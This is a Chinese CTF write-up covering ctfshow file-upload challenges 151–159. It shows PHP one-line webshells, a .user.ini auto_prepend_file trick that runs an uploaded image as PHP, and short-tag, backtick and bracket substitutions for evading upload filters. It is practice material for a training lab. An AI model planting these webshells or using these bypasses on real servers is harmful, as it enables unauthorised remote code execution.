0
点赞
收藏
分享

微信扫一扫

“2023年的技术发展与个人成长:回顾与展望“

天涯学馆 2023-12-29 阅读 42
安全

文章目录

文件上传思路

在这里插入图片描述
在这里插入图片描述

web 151

打开页面显示:前台校验不可靠。说明这题是前端验证。
在这里插入图片描述
右键查看源代码,找到与上传点有关的前端代码:
在这里插入图片描述
  这里使用了一个叫Layui的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。可见这里前端只允许上传图片类型的文件,且文件后缀名为png。

  绕过前端验证的最简单方法就是,上传一个png的webshell,再使用burp抓包更改文件后缀名,再访问上传的webshell。
在这里插入图片描述
在这里插入图片描述
可见,上传成功~,下一步就是写一个shell<?php @eval($_POST['cmd']);?>,用webshell连接工具蚁剑去连接上传的webshell。

这里我们详细分析一句话木马,不借助工具获取flag。

  1. php代码要写在<?php ?>中,php解析器才会认出这是php代码;
  2. @符号的意思是不报错,即使执行错误,也不报错;
  3. eval():把字符串当做PHP代码执行;
  4. $_POST['cmd']接收POST传参,传参的变量名叫cmd
  5. php执行系统命令的函数有system()exec()shell_exec()、反撇号。php执行外部命令
    在这里插入图片描述

在这里插入图片描述

web 152

跟前一题一样的

web 153

知识点

  自PHP 5.3.0起,PHP支持基于每个目录的INI文件配置,此类文件仅被CGI/Fast SAPI处理。如果PHP以模块化的方式运行在Apache里,则.htaccess文件有同样效果。除了主php.ini之外,php还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定)。如果被执行的php文件在web根目录之外,则只扫描该目录。在这里插入图片描述

  在.user.ini风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。用人话说就是除了PHP_INI_SYSTEM模式的配置以外都可以在.user.ini中进行重写。两个重要的配置选项:

auto_append_file=filename     //相当于在每个php文件尾加上 include(“filename”)
auto_prepend_file=filename    //相当于文件头加上 include(“filename”)

  利用.user,ini的方法:保证三个文件(.user.inishell.pngxx.php)在同一目录下,再执行该目录下的php文件。例如:

	//.user.ini
	auto_prepend_file=1.png
 
	//1.png
	<?php phpinfo();?>
 
	//1.php(任意php文件)

解题

此题前后端都检测content-type值,只允许上传PNG文件。
在这里插入图片描述
上传.user.ini文件,内容为auto_prepend_file=shell.png在这里插入图片描述
上传shell.png文件
在这里插入图片描述
  从之前可以得知,upload文件夹下有一个index.php的文件,故访问../upload/index.php?cmd=phpinfo();,可以看到phpinfo的页面。

在这里插入图片描述

web 154

知识点:过滤<?php
绕过方法:使用短标签进行绕过(没有限制条件)。如:

<?php @eval($_GET['cmd']);?> == <=@eval($_GET['cmd']);>

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

pyload:

<?=@eval($_GET['cmd']);?>

在这里插入图片描述
在这里插入图片描述

web 155

同web 154

web 156

知识点:过滤php[]关键字
绕过方法:

  • php关键字被过滤,使用php短标签进行绕过;
  • []被过滤,使用{}进行替换。例如:
    <?php @eval($_GET['cmd']);?> ==  <?php @eval($_GET{cmd});?>
    

payload:

<?=system('cat ../fl*')?>

在这里插入图片描述

web 157

在前面的基础上,过滤了{;,而且文件内容不能有php字符串。
绕过方法:

  • 过滤;,则在短标签里,可以省略;。例如:
<?php @eval($_GET{cmd});?> == <?php @eval($_GET{cmd})?>
  • 过滤{,那就不用eval函数接受参数,再执行系统命令,直接用system()函数执行系统命令。如<?=system(ls)?>
    -cat ../flag.php==cat ../fl*

payload:

<?=system('cat ../fl*')?>

在这里插入图片描述

web 158

同web157

web 159

在前面的基础上,过滤了(。绕过方法:直接用反撇号执行系统命令,反撇号就相当于shell_exec()函数。payload:

<?=`cat ../fl*`?>

在这里插入图片描述

举报

相关推荐

0 条评论